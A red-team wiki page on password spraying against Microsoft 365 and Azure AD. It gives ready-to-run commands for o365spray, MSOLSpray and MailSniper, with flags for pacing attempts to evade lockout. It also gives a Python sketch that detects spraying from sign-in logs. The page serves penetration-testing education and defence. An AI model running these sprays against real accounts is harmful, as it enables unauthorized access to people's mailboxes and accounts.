# Password Spraying

## Theory

Once a list of existing usernames is established, a password spray attack can be executed to attempt retrieving passwords for these accounts. Password spraying involves using a single password (e.g., 'Password01') or a small set of common passwords across multiple accounts.

## Practice

{% tabs %}
{% tab title="o365spray" %}
[o365spray](https://github.com/0xZDH/o365spray) (Python) can be used for password spraying as follows. It supports various methods: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst.

{% hint style="info" %}
The oauth2 module can be used for federated spraying, but this will ONLY work when the target tenant has enabled password synchronization; otherwise, authentication will always fail. By default, the tool falls back to the 'adfs' module when federation is identified.
{% endhint %}

```bash
# --spray: Password spray mode
# -U: User file
# -P: Password file
# -p: Password
# --count: Number of password attempts per user before resetting the lockout timer
# --lockout: Lockout policy's reset time (in minutes)
# -d, --domain: Target domain
# --spray-module: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst

python o365spray.py --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com
```

{% endtab %}

{% tab title="MSOLSpray" %}
[MSOLSpray](https://github.com/dafthack/MSOLSpray) (PowerShell) can be used for password spraying as follows.

```powershell
Invoke-MSOLSpray -UserList valid-emails.txt -Password <PASSWORD> -Verbose
```

{% endtab %}

{% tab title="MailSniper" %}
[MailSniper](https://github.com/dafthack/MailSniper) (PowerShell) can be used for password spraying as follows.

```powershell
Invoke-PasswordSprayEWS -ExchHostname outlook.office365.com -UserList valid-emails.txt -Password <PASSWORD>
```

{% endtab %}
{% endtabs %}
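
Because a spray keeps the number of attempts per account low (see `--count` and `--lockout` above), per-account failure counters rarely fire; the signal is one source failing against many distinct users. The following is an added detection sketch, not code from the original page or from any of the tools above. The event tuple format, thresholds, IP addresses and usernames are constructed assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

def sample_events():
    """Constructed sign-in events: (timestamp, source IP, username, result)."""
    base, ev = datetime(2024, 1, 15, 9, 0), []
    # One source, one attempt each against six users, then a success: spray pattern.
    for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"]):
        ev.append((base + timedelta(seconds=20 * i), "203.0.113.10", user, "failure"))
    ev.append((base + timedelta(minutes=6), "203.0.113.10", "carol", "success"))
    # One source, many attempts against one user: not a spray (brute force or typo).
    for i in range(6):
        ev.append((base + timedelta(minutes=i), "198.51.100.7", "grace", "failure"))
    ev.append((base + timedelta(minutes=2), "192.0.2.44", "heidi", "failure"))
    return ev

def detect_spray(events, window=timedelta(minutes=30), min_users=5, max_avg_tries=3.0):
    """Flag sources whose failures, inside a sliding window, hit at least
    min_users distinct accounts with a low average number of tries per account."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in sorted(events):
        by_ip[ip].append((ts, user, result))
    alerts = {}
    for ip, rows in by_ip.items():
        fails = [(ts, user) for ts, user, result in rows if result == "failure"]
        start = 0
        for end in range(len(fails)):
            # Shrink the window from the left until it spans at most `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            tries = Counter(user for _, user in fails[start:end + 1])
            if len(tries) >= min_users and sum(tries.values()) / len(tries) <= max_avg_tries:
                first = fails[start][0]
                # A success from a spraying source suggests a guessed password.
                hits = {u for ts, u, r in rows if r == "success" and ts >= first}
                alerts[ip] = {
                    "targeted": sorted({u for _, u in fails[start:]}),
                    "possible_compromise": sorted(hits),
                }
                break
    return alerts

if __name__ == "__main__":
    for ip, info in detect_spray(sample_events()).items():
        print(ip, info)
```

Accounts listed under `possible_compromise` are the ones to prioritise for password reset and session revocation.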

## Resources

{% embed url="https://www.synacktiv.com/publications/azure-ad-introduction-for-red-teamers#attacking-azure-ad" %}
